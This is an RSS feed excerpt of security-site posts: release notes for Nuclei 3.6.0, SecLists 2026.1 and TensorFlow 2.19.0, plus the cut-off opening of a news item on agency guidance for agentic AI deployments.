<li>Javascript Multi-Port Support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pussycat0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pussycat0x">@pussycat0x</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6501" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6501/hovercard">#6501</a>)</li>
<li>Direct fuzzing using target URL for OpenAPI/Swagger by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roiswd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roiswd">@roiswd</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6542" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6542/hovercard">#6542</a>)</li>
<li>Bump DSL with .NET deserialization helpers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ice3man543/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ice3man543">@Ice3man543</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6625" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6625/hovercard">#6625</a>)</li>
<li>Implement persistent metadata cache in loader by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6630" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6630/hovercard">#6630</a>)</li>
<li>Check for undefined params for lazy evaluation in variables by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6618" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6618/hovercard">#6618</a>)</li>
</ul>
<h2>🐛 Fixed</h2>
<ul>
<li>Configure <code>tmpDir</code> for SDK by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AuditeMarlow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AuditeMarlow">@AuditeMarlow</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6596" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6596/hovercard">#6596</a>)</li>
<li>Skip DNS lookups on Interactsh domains by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6614" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6614/hovercard">#6614</a>)</li>
<li>Restore parallel processing in file protocol by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6493" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6493/hovercard">#6493</a>)</li>
</ul>
<h2>⚙️ Changed / Improvements</h2>
<ul>
<li>Enable <code>BenchmarkRunEnumeration/Default</code> benchmark by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6603" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6603/hovercard">#6603</a>)</li>
<li>Cache Go-rod browser in CI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6640" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6640/hovercard">#6640</a>)</li>
<li>Apply free-disk-space check on tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6642" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6642/hovercard">#6642</a>)</li>
<li>Disable stale workflow for enhancements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6637" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6637/hovercard">#6637</a>)</li>
<li>Omit unnecessary reassignment by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ledigang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ledigang">@ledigang</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6622" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6622/hovercard">#6622</a>)</li>
</ul>
<h2>🧹 Maintenance / Dependencies</h2>
<ul>
<li>Bump the modules group with 6 updates by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] (<a href="https://github.com/projectdiscovery/nuclei/pull/6615" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6615/hovercard">#6615</a>)</li>
<li>Bump actions/checkout from 5 to 6 in workflows by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] (<a href="https://github.com/projectdiscovery/nuclei/pull/6628" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6628/hovercard">#6628</a>)</li>
<li>Bump PD modules &amp; update <code>httputil</code> calls by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] (<a href="https://github.com/projectdiscovery/nuclei/pull/6629" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6629/hovercard">#6629</a>)</li>
<li>Bump the modules group with 11 updates by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] (<a href="https://github.com/projectdiscovery/nuclei/pull/6646" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6646/hovercard">#6646</a>)</li>
<li>Bump golang.org/x/crypto from 0.43.0 to 0.45.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] (<a href="https://github.com/projectdiscovery/nuclei/pull/6621" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6621/hovercard">#6621</a>)</li>
<li>Bump github.com/projectdiscovery/fastdialer@v0.4.16 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6624" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6624/hovercard">#6624</a>)</li>
</ul>
<h2>🌱 New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AuditeMarlow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AuditeMarlow">@AuditeMarlow</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6596" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6596/hovercard">#6596</a>)</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roiswd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roiswd">@roiswd</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6542" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6542/hovercard">#6542</a>)</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ledigang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ledigang">@ledigang</a> (<a href="https://github.com/projectdiscovery/nuclei/pull/6622" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6622/hovercard">#6622</a>)</li>
</ul>
<p><strong>Full Changelog:</strong> <a href="https://github.com/projectdiscovery/nuclei/compare/v3.5.1...v3.6.0">v3.5.1 → v3.6.0</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026.1]]></title>
<description><![CDATA[Highlights
🔥 New wordlists

🔥 feat(wordlist): Created 2025 most used passwords wordlist (PR #1263)
🔥 feat(wordlist): Added AI ethical and safety boundary testing wordlists (Commit d7400c8)
🔥 feat(wordlist): Updated top1million subdomains lists with cloudflare data (PR #1275)
feat(wordlist): Add w...]]></description>
<link>https://tsecurity.de/de/3487831/it-security-tools/20261/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487831/it-security-tools/20261/</guid>
<pubDate>Tue, 05 May 2026 02:19:30 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Highlights</h1>
<h2>🔥 New wordlists</h2>
<ul>
<li><strong>🔥 feat(wordlist): Created 2025 most used passwords wordlist (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3639550843" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1263" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1263/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1263">#1263</a>)</strong></li>
<li><strong>🔥 feat(wordlist): Added AI ethical and safety boundary testing wordlists (Commit <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/danielmiessler/SecLists/commit/d7400c864a7b41ebe6668c694723c7576a3f87c1/hovercard" href="https://github.com/danielmiessler/SecLists/commit/d7400c864a7b41ebe6668c694723c7576a3f87c1"><tt>d7400c8</tt></a>)</strong></li>
<li><strong>🔥 feat(wordlist): Updated top1million subdomains lists with cloudflare data (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3822480078" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1275" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1275/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1275">#1275</a>)</strong></li>
<li>feat(wordlist): Add wordlists for: Kubernetes, Docker, Elasticsearch, Grafana, GitLab, Prometheus (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084600495" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1293" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1293/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1293">#1293</a>)</li>
<li>feat(wordlist): Added OpenWRT discovery wordlist</li>
<li>feat(wordlist): Added RSTP camera wordlist</li>
<li>feat(wordlist): Added SOfensive LFI wordlist and removed redundant GracefulSecurity wordlist</li>
<li>feat(wordlist): Added wordlist for Bluedit CMS</li>
<li>feat(wordlist): Added locale-codes wordlist and language-codes wordlist</li>
<li>feat(wordlist): Add <code>common.txt</code> in brazilian portuguese (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3876753451" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1279" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1279/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1279">#1279</a>)</li>
<li>feat(wordlist): Add more hispanic names (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012334598" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1290" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1290/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1290">#1290</a>)</li>
<li>feat(wordlist): Added list of Brazilian names</li>
<li>feat(wordlist): Added polish password wordlist (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725927203" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1272" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1272/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1272">#1272</a>)</li>
<li>feat(wordlist): Added Polish wordlist to Passwords/Common-Credentials/Language-Specific</li>
</ul>
<h2>🌐 Updates to existing wordlists</h2>
<ul>
<li>feat(wordlist): Added more API fuzzing endpoints</li>
<li>feat(wordlist): Added more entries to "SAP-NetWeaver.txt" (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3508790863" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1255" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1255/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1255">#1255</a>)</li>
<li>feat(wordlist): Added more payloads to graphql wordlist (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4086487937" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1294" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1294/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1294">#1294</a>)</li>
<li>feat(wordlist): Added more payloads to login_bypass.txt</li>
<li>feat(wordlist): Added more payloads to Swagger.txt</li>
<li>feat(wordlist): Updated list of Spring endpoints. (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3502893889" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1253" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1253/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1253">#1253</a>)</li>
<li>feat(wordlist): Updated list of years in 'quickhits.txt' (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934615834" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1287" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1287/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1287">#1287</a>)</li>
</ul>
<h2>⚙️ Miscellanous cleanup</h2>
<p>This release also includes wordlist cleanup and documentation fixes:</p>
<ul>
<li>chore(wordlist): Added 'regional_' prefix to country codes wordlists</li>
<li>chore(wordlist): Classify LFI wordlists by OS</li>
<li>chore(wordlist): Moved 'rstp.txt' wordlist from fuzzing to Discovery/Web-Content/Service-Specific</li>
<li>chore(wordlist): Re-added JWT secrets from PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3252347532" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1235" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1235/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1235">#1235</a></li>
<li>chore(wordlist): Removed duplicates from login_bypass.txt</li>
<li>chore(wordlist): Removed useless wordlist 'der-postillon.txt'</li>
<li>chore(wordlist): Renamed Windows LFI wordlist from adeadfed</li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/willcipher/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/willcipher">@willcipher</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3508790863" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1255" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1255/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1255">#1255</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TeaLeavesJumping/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TeaLeavesJumping">@TeaLeavesJumping</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725927203" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1272" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1272/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1272">#1272</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JooReb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JooReb">@JooReb</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3849489066" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1278" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1278/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1278">#1278</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SQU4NCH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SQU4NCH">@SQU4NCH</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3876753451" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1279" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1279/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1279">#1279</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marcel2012/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marcel2012">@marcel2012</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934615834" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1287" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1287/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1287">#1287</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/valerodev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/valerodev">@valerodev</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012334598" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1290" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1290/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1290">#1290</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xBassia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xBassia">@0xBassia</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084600495" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1293" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1293/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1293">#1293</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mugeha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mugeha">@Mugeha</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4086487937" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1294" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1294/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1294">#1294</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/danielmiessler/SecLists/compare/2025.3...2026.1"><tt>2025.3...2026.1</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TensorFlow 2.19.0-rc0]]></title>
<description><![CDATA[Release 2.19.0
TensorFlow
Breaking Changes

LiteRT, a.k.a. tf.lite:

C++ API:

The public constants tflite::Interpreter:kTensorsReservedCapacity and tflite::Interpreter:kTensorsCapacityHeadroom are now const references, rather than constexpr compile-time constants. (This is to enable better API c...]]></description>
<link>https://tsecurity.de/de/3487811/downloads/tensorflow-2190-rc0/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487811/downloads/tensorflow-2190-rc0/</guid>
<pubDate>Tue, 05 May 2026 02:17:30 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Release 2.19.0</h1>
<h2>TensorFlow</h2>
<h3>Breaking Changes</h3>
<ul>
<li><code>LiteRT</code>, a.k.a. <code>tf.lite</code>:
<ul>
<li>C++ API:
<ul>
<li>The public constants <code>tflite::Interpreter:kTensorsReservedCapacity</code> and <code>tflite::Interpreter:kTensorsCapacityHeadroom</code> are now const references, rather than <code>constexpr</code> compile-time constants. (This is to enable better API compatibility for TFLite in Play services while preserving the implementation flexibility to change the values of these constants in the future.)</li>
<li>Interpreter:
<ul>
<li><code>tf.lite.Interpreter</code> gives deprecation warning redirecting to its new location at <code>ai_edge_litert.interpreter</code>, as the API <code>tf.lite.Interpreter</code> will be deleted in TF 2.20. See the <a href="https://ai.google.dev/edge/litert/migration" rel="nofollow">migration guide</a> for details.</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3>Known Caveats</h3>
<h3>Major Features and Improvements</h3>
<ul>
<li><code>tf.lite</code>
<ul>
<li><code>tfl.Cast</code> op is now supporting <code>bfloat16</code> in runtime kernel.</li>
</ul>
</li>
</ul>
<h3>Bug Fixes and Other Changes</h3>
<ul>
<li>We have stopped publishing <code>libtensorflow</code> packages but it can still be unpacked from the PyPI package.</li>
</ul>
<h2>Thanks to our Contributors</h2>
<p>This release contains contributions from many people at Google, as well as:</p>
<p>Akhil Goel, akhilgoe, Alain Flaischer, Alex, Alexander Pivovarov, Alexander Shadchin, Alexis Praga, Amrinfathima-Mcw, Andrey Pikas, Andrey Portnoy, Ankur Singh, Ashiq Imran, Assoap, c8ef, charleshofer, Chase Riley Roberts, Chenhao Jiang, Chongyun Lee, Claudio Desouza, Corentin Godeau, Crefeda Rodrigues, Danny Burrow, dependabot[bot], Dimitris Vardoulakis, Dragan Mladjenovic, Elfie Guo, Emmanuel Ferdman, fiberflow, flyingcat, Gary Yi-Hung Chen, Georg Stefan Schmid, Gerwout Van Der Veen, Harsha H S, Harshit Monish, Hugo Mano, i.Pear, Ilia Sergachev, Jane Liu, Jaroslav Sevcik, Jc (Jonathan Chen), Jerry Ge, Jian Li, johndoknjas, Johnny, Jonathan Albrecht, Kaixi Hou, Kanvi Khanna, keerthanakadiri, Kevin Ji, Kiran Sai Ramineni, kwoncy2020, LakshmiKalaKadali, Lee, Jun Seok, Mahmoud Abuzaina, Matt Bahr, mayuyuace, Melissa Weber Mendonça, misterBart, Mkarpushin-Enhancelab, Mmakevic-Amd, mraunak, nallave, Nayana Thorat, Nayana-Ibm, nick.camarena, Nicolas Castet, Om Thakkar, oyzh, Parsa Homayouni, Patrick Toulme, Pavel Emeliyanenko, Pavithra Eswaramoorthy, Pearu Peterson, pemeliya, Philipp Hack, Ravi Kumar Soni, redwrasse, Ruturaj Vaidya, Sallenkey-Wei, Sandeep Gupta, Sergey Kozub, Sevin Fide Varoglu, Shanbin Ke, Shaogang Wang, Shixin Zhang, Shraiysh, Shu Wang, Silvio Traversaro, snadampal, Sunita Nadampalli, Tai Ly, Tatwai Chong, tchatow, tdanyluk, Terry Sun, Tilak, Tj Xu, Trevor Morris, Twice, vfdev, Vladimir Silyaev, Weisser, Pascal, wokron, Won Jeon, Xuefei Jiang, Zentrik, Zoranjovanovic-Ns</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TensorFlow 2.19.0]]></title>
<description><![CDATA[Release 2.19.0
TensorFlow
Breaking Changes

LiteRT, a.k.a. tf.lite:

C++ API:

The public constants tflite::Interpreter:kTensorsReservedCapacity and tflite::Interpreter:kTensorsCapacityHeadroom are now const references, rather than constexpr compile-time constants. (This is to enable better API c...]]></description>
<link>https://tsecurity.de/de/3487809/downloads/tensorflow-2190/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487809/downloads/tensorflow-2190/</guid>
<pubDate>Tue, 05 May 2026 02:17:27 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Release 2.19.0</h1>
<h2>TensorFlow</h2>
<h3>Breaking Changes</h3>
<ul>
<li><code>LiteRT</code>, a.k.a. <code>tf.lite</code>:
<ul>
<li>C++ API:
<ul>
<li>The public constants <code>tflite::Interpreter:kTensorsReservedCapacity</code> and <code>tflite::Interpreter:kTensorsCapacityHeadroom</code> are now const references, rather than <code>constexpr</code> compile-time constants. (This is to enable better API compatibility for TFLite in Play services while preserving the implementation flexibility to change the values of these constants in the future.)</li>
</ul>
</li>
<li>Python API:
<ul>
<li><code>tf.lite.Interpreter</code> gives deprecation warning redirecting to its new location at <code>ai_edge_litert.interpreter</code>, as the API <code>tf.lite.Interpreter</code> will be deleted in TF 2.20. See the <a href="https://ai.google.dev/edge/litert/migration" rel="nofollow">migration guide</a> for details.</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3>Known Caveats</h3>
<h3>Major Features and Improvements</h3>
<ul>
<li><code>tf.lite</code>
<ul>
<li><code>tfl.Cast</code> op is now supporting <code>bfloat16</code> in runtime kernel.</li>
</ul>
</li>
</ul>
<h3>Bug Fixes and Other Changes</h3>
<ul>
<li>We have stopped publishing <code>libtensorflow</code> packages but it can still be unpacked from the PyPI package.</li>
</ul>
<h2>Thanks to our Contributors</h2>
<p>This release contains contributions from many people at Google, as well as:</p>
<p>Akhil Goel, akhilgoe, Alain Flaischer, Alex, Alexander Pivovarov, Alexander Shadchin, Alexis Praga, Amrinfathima-Mcw, Andrey Pikas, Andrey Portnoy, Ankur Singh, Ashiq Imran, Assoap, c8ef, charleshofer, Chase Riley Roberts, Chenhao Jiang, Chongyun Lee, Claudio Desouza, Corentin Godeau, Crefeda Rodrigues, Danny Burrow, dependabot[bot], Dimitris Vardoulakis, Dragan Mladjenovic, Elfie Guo, Emmanuel Ferdman, fiberflow, flyingcat, Gary Yi-Hung Chen, Georg Stefan Schmid, Gerwout Van Der Veen, Harsha H S, Harshit Monish, Hugo Mano, i.Pear, Ilia Sergachev, Jane Liu, Jaroslav Sevcik, Jc (Jonathan Chen), Jerry Ge, Jian Li, johndoknjas, Johnny, Jonathan Albrecht, Kaixi Hou, Kanvi Khanna, keerthanakadiri, Kevin Ji, Kiran Sai Ramineni, kwoncy2020, LakshmiKalaKadali, Lee, Jun Seok, Mahmoud Abuzaina, Matt Bahr, mayuyuace, Melissa Weber Mendonça, misterBart, Mkarpushin-Enhancelab, Mmakevic-Amd, mraunak, nallave, Nayana Thorat, Nayana-Ibm, nick.camarena, Nicolas Castet, Om Thakkar, oyzh, Parsa Homayouni, Patrick Toulme, Pavel Emeliyanenko, Pavithra Eswaramoorthy, Pearu Peterson, pemeliya, Philipp Hack, Ravi Kumar Soni, redwrasse, Ruturaj Vaidya, Sallenkey-Wei, Sandeep Gupta, Sergey Kozub, Sevin Fide Varoglu, Shanbin Ke, Shaogang Wang, Shixin Zhang, Shraiysh, Shu Wang, Silvio Traversaro, snadampal, Sunita Nadampalli, Tai Ly, Tatwai Chong, tchatow, tdanyluk, Terry Sun, Tilak, Tj Xu, Trevor Morris, Twice, vfdev, Vladimir Silyaev, Weisser, Pascal, wokron, Won Jeon, Xuefei Jiang, Zentrik, Zoranjovanovic-Ns</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security agencies draw red lines around agentic AI deployments]]></title>
<description><![CDATA[With prompt injection and other attack pathways consistently surfacing across agentic AI deployments, security watchdogs have stepped in, collectively, to draw some hard boundaries.



A joint advisory from the US Cybersecurity and Infrastructure Security Agency (CISA) and international partners ...]]></description>
<link>https://tsecurity.de/de/3485998/it-security-nachrichten/security-agencies-draw-red-lines-around-agentic-ai-deployments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3485998/it-security-nachrichten/security-agencies-draw-red-lines-around-agentic-ai-deployments/</guid>
<pubDate>Mon, 04 May 2026 14:07:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
